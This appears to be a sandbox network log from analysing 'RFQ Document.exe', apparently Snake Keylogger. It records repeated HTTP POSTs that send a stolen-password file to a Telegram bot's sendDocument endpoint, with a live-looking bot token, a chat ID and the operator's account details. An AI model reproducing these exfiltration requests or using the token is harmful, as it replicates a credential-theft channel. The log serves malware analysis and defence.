--------------------------8d98255f79531e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:50 UTC	496	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:50 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:50 UTC	497	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
314	192.168.2.4	50151	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:51 UTC	497	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f7aaa6fe Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:51 UTC	497	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 61 61 61 36 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f7aaa6feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:59 UTC	497	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:59 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 3 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:59 UTC	498	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
315	192.168.2.4	50152	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:59 UTC	498	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fc8e57da Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:59 UTC	498	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 38 65 35 37 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fc8e57daContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:02 UTC	499	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:02 UTC	499	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12898,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808802,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
316	192.168.2.4	50153	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:02 UTC	500	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f9c112f6 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:02 UTC	500	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 39 63 31 31 32 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f9c112f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:02 UTC	500	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:02 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:02 UTC	501	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12899,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808802,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
317	192.168.2.4	50154	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:02 UTC	501	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f9ebfc06 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:02 UTC	501	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 39 65 62 66 63 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f9ebfc06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:02 UTC	502	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:02 UTC	502	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12900,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808802,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
318	192.168.2.4	50155	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:02 UTC	503	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fa063563 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:02 UTC	503	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 30 36 33 35 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fa063563Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:02 UTC	503	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:02 UTC	504	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12901,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808802,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
319	192.168.2.4	50156	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:02 UTC	504	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fa1e0cda Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:02 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 31 65 30 63 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fa1e0cdaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:03 UTC	505	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:03 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:03 UTC	505	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12902,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808803,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49806	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:27 UTC	51	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c5b851c7 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:27 UTC	51	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 62 38 35 31 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c5b851c7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:27 UTC	51	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:27 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:27 UTC	52	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12612,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
320	192.168.2.4	50157	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:03 UTC	506	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fa35e4b2 Host: api.telegram.org Content-Length: 407
